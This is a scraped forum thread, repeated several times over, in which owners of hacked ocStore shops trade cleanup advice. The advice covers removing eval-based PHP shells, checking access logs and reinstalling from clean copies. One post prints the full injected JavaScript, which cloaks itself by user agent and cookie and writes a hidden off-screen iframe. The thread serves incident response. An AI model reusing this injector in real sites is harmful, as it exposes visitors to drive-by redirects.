Baco Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина. Надіслати Поділитися на інших сайтах More sharing options... colaweb Опубліковано: 23 жовтня 2013 Автор Share Опубліковано: 23 жовтня 2013 Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина. Шеллы сидели в Joomle. Почистил все файлы .php где был код с eval(.. Пока все тихо, ищу "дырку" . Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 Шеллы сидели в Joomle. Почистил все файлы .php где был код с eval(.. Пока все тихо, ищу "дырку" . вот об этом я вам и писал ранее... а дырку ищите в правах доступа к файлам и папкам... и сделайте дополнительную авторизацию для админки на уровне сервера... Надіслати Поділитися на інших сайтах More sharing options... Doktorsaitov Опубліковано: 29 жовтня 2013 Share Опубліковано: 29 жовтня 2013 ТС скрипт который вы использовали ищет самое популярное из вредоносных кодов (говорю по опыту), проблема в следующий раз просто усложниться. Постарайтесь глазами пройтись по коду вашего сайта. Так же хотел обратить внимание, что и хостинг играет большую роль, точнее его натсройка, как выше говорили вам указать права на папки и файлы - это может не помочь, если не будут правильно выставлены настройки сервера их просто будут менять на те, котоыре нужны злоумшлинику. Надіслати Поділитися на інших сайтах More sharing options... 1 month later... Pavel555 Опубліковано: 23 грудня 2013 Share Опубліковано: 23 грудня 2013 Тоже попалась эта зараза. Действовал так: удалил вредоносный код из всех .js в access_log поискал все, что содержит "js", среди результатов внимание привлекли запросы POST с именем файла 6a442.php поискал по всем файлам на сервере по содержимому вышеуказанного php, поиск дал еще 95 файлов с таким же содержимым в разных папках joomla удалил все найденные php Надіслати Поділитися на інших сайтах More sharing options... 2 months later... Pavel555 Опубліковано: 23 березня 2014 Share Опубліковано: 23 березня 2014 В общем, вышеуказонный метод помогает, но ненадолго. Через неделю-другую вредоносный код появляется снова. Зараженные файлы лечу снова, но видимо вирус где-то остается недочищенным. У кого какие идеи, как дочистить супостата? Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... elitesmart Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 А разве оригинала у вас не осталось? База то не тронута, а сайт перезалейте, максимально оригинальными данными. Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 Идей много, вплоть до анализа логов доступа. Вам нужно лечить? или заниматься самолечением? Надіслати Поділитися на інших сайтах More sharing options... 1 month later... andreyvebuiskii Опубліковано: 19 травня 2014 Share Опубліковано: 19 травня 2014 Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ Может это поможет? Вирусдай (писал обзор тут). Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки [Решено? {joomla}] Взлом магазина *.js
colaweb Опубліковано: 23 жовтня 2013 Автор Share Опубліковано: 23 жовтня 2013 Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина. Шеллы сидели в Joomle. Почистил все файлы .php где был код с eval(.. Пока все тихо, ищу "дырку" . Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 Шеллы сидели в Joomle. Почистил все файлы .php где был код с eval(.. Пока все тихо, ищу "дырку" . вот об этом я вам и писал ранее... а дырку ищите в правах доступа к файлам и папкам... и сделайте дополнительную авторизацию для админки на уровне сервера... Надіслати Поділитися на інших сайтах More sharing options... Doktorsaitov Опубліковано: 29 жовтня 2013 Share Опубліковано: 29 жовтня 2013 ТС скрипт который вы использовали ищет самое популярное из вредоносных кодов (говорю по опыту), проблема в следующий раз просто усложниться. Постарайтесь глазами пройтись по коду вашего сайта. Так же хотел обратить внимание, что и хостинг играет большую роль, точнее его натсройка, как выше говорили вам указать права на папки и файлы - это может не помочь, если не будут правильно выставлены настройки сервера их просто будут менять на те, котоыре нужны злоумшлинику. Надіслати Поділитися на інших сайтах More sharing options... 1 month later... Pavel555 Опубліковано: 23 грудня 2013 Share Опубліковано: 23 грудня 2013 Тоже попалась эта зараза. Действовал так: удалил вредоносный код из всех .js в access_log поискал все, что содержит "js", среди результатов внимание привлекли запросы POST с именем файла 6a442.php поискал по всем файлам на сервере по содержимому вышеуказанного php, поиск дал еще 95 файлов с таким же содержимым в разных папках joomla удалил все найденные php Надіслати Поділитися на інших сайтах More sharing options... 2 months later... Pavel555 Опубліковано: 23 березня 2014 Share Опубліковано: 23 березня 2014 В общем, вышеуказонный метод помогает, но ненадолго. Через неделю-другую вредоносный код появляется снова. Зараженные файлы лечу снова, но видимо вирус где-то остается недочищенным. У кого какие идеи, как дочистить супостата? Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... elitesmart Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 А разве оригинала у вас не осталось? База то не тронута, а сайт перезалейте, максимально оригинальными данными. Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 Идей много, вплоть до анализа логов доступа. Вам нужно лечить? или заниматься самолечением? Надіслати Поділитися на інших сайтах More sharing options... 1 month later... andreyvebuiskii Опубліковано: 19 травня 2014 Share Опубліковано: 19 травня 2014 Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ Может это поможет? Вирусдай (писал обзор тут). Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку
Гість Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 Шеллы сидели в Joomle. Почистил все файлы .php где был код с eval(.. Пока все тихо, ищу "дырку" . вот об этом я вам и писал ранее... а дырку ищите в правах доступа к файлам и папкам... и сделайте дополнительную авторизацию для админки на уровне сервера... Надіслати Поділитися на інших сайтах More sharing options...
Doktorsaitov Опубліковано: 29 жовтня 2013 Share Опубліковано: 29 жовтня 2013 ТС скрипт который вы использовали ищет самое популярное из вредоносных кодов (говорю по опыту), проблема в следующий раз просто усложниться. Постарайтесь глазами пройтись по коду вашего сайта. Так же хотел обратить внимание, что и хостинг играет большую роль, точнее его натсройка, как выше говорили вам указать права на папки и файлы - это может не помочь, если не будут правильно выставлены настройки сервера их просто будут менять на те, котоыре нужны злоумшлинику. Надіслати Поділитися на інших сайтах More sharing options...
Pavel555 Опубліковано: 23 грудня 2013 Share Опубліковано: 23 грудня 2013 Тоже попалась эта зараза. Действовал так: удалил вредоносный код из всех .js в access_log поискал все, что содержит "js", среди результатов внимание привлекли запросы POST с именем файла 6a442.php поискал по всем файлам на сервере по содержимому вышеуказанного php, поиск дал еще 95 файлов с таким же содержимым в разных папках joomla удалил все найденные php Надіслати Поділитися на інших сайтах More sharing options...
Pavel555 Опубліковано: 23 березня 2014 Share Опубліковано: 23 березня 2014 В общем, вышеуказонный метод помогает, но ненадолго. Через неделю-другую вредоносный код появляется снова. Зараженные файлы лечу снова, но видимо вирус где-то остается недочищенным. У кого какие идеи, как дочистить супостата? Надіслати Поділитися на інших сайтах More sharing options...
elitesmart Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 А разве оригинала у вас не осталось? База то не тронута, а сайт перезалейте, максимально оригинальными данными. Надіслати Поділитися на інших сайтах More sharing options...
chukcha Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 Идей много, вплоть до анализа логов доступа. Вам нужно лечить? или заниматься самолечением? Надіслати Поділитися на інших сайтах More sharing options... 1 month later... andreyvebuiskii Опубліковано: 19 травня 2014 Share Опубліковано: 19 травня 2014 Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ Может это поможет? Вирусдай (писал обзор тут). Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0
andreyvebuiskii Опубліковано: 19 травня 2014 Share Опубліковано: 19 травня 2014 Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ Может это поможет? Вирусдай (писал обзор тут). Надіслати Поділитися на інших сайтах More sharing options...
Recommended Posts